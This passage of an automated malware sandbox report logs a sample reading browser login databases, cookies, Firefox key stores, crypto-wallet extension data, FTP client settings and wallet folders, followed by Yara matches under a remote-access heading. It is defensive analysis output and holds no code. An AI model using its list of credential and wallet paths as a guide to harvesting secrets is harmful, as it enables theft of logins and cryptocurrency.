Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000020.00000002.3341551842.0000000001388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2d569de7b1.exe PID: 7448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000000.2977404002.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3145991383.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.3221111651.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3155884712.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3081987586.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3235939586.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2993490502.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2992177721.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3237002232.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP